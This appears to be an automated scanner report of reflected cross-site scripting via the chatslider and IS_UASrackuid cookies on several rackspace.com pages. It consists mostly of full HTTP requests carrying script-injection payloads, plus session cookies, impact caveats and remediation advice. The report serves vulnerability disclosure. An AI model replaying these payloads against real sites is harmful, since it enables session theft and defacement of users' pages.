GET /information/contactus.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f888c34"><script>alert(1)</script>aed8f9fc615; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51e61"><script>alert(1)</script>8c7903db26d was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/contactus.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D51e61"><script>alert(1)</script>8c7903db26d; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdcb9"%3balert(1)//cc702667c7a was submitted in the chatslider cookie. This input was echoed as bdcb9";alert(1)//cc702667c7a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/contactus.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dbdcb9"%3balert(1)//cc702667c7a; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68909"%3balert(1)//1280d1ee247 was submitted in the IS_UASrackuid cookie. This input was echoed as 68909";alert(1)//1280d1ee247 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/events/briefingprogram.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f868909"%3balert(1)//1280d1ee247; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a58de"><script>alert(1)</script>6ba59b20196 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/events/briefingprogram.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8a58de"><script>alert(1)</script>6ba59b20196; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 184ff"%3balert(1)//21dcc59ce65 was submitted in the chatslider cookie. This input was echoed as 184ff";alert(1)//21dcc59ce65 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/events/briefingprogram.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D184ff"%3balert(1)//21dcc59ce65; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0ef7"><script>alert(1)</script>4f1788956fb was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/events/briefingprogram.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Db0ef7"><script>alert(1)</script>4f1788956fb; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2905"><script>alert(1)</script>a869f3f644 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/events/green.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8e2905"><script>alert(1)</script>a869f3f644; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 258be"%3balert(1)//23709ad9b87 was submitted in the IS_UASrackuid cookie. This input was echoed as 258be";alert(1)//23709ad9b87 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/events/green.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8258be"%3balert(1)//23709ad9b87; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f745f"%3balert(1)//eb3ca469bbd was submitted in the chatslider cookie. This input was echoed as f745f";alert(1)//eb3ca469bbd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/events/green.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Df745f"%3balert(1)//eb3ca469bbd; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf545"><script>alert(1)</script>f7d4fbe9b3d was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/events/green.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dcf545"><script>alert(1)</script>f7d4fbe9b3d; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51a2b"%3balert(1)//fe7898ac58e was submitted in the IS_UASrackuid cookie. This input was echoed as 51a2b";alert(1)//fe7898ac58e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/events/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f851a2b"%3balert(1)//fe7898ac58e; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d242"><script>alert(1)</script>1a3709cfedb was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/events/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f87d242"><script>alert(1)</script>1a3709cfedb; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f1e2"%3balert(1)//0356efb5555 was submitted in the chatslider cookie. This input was echoed as 3f1e2";alert(1)//0356efb5555 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
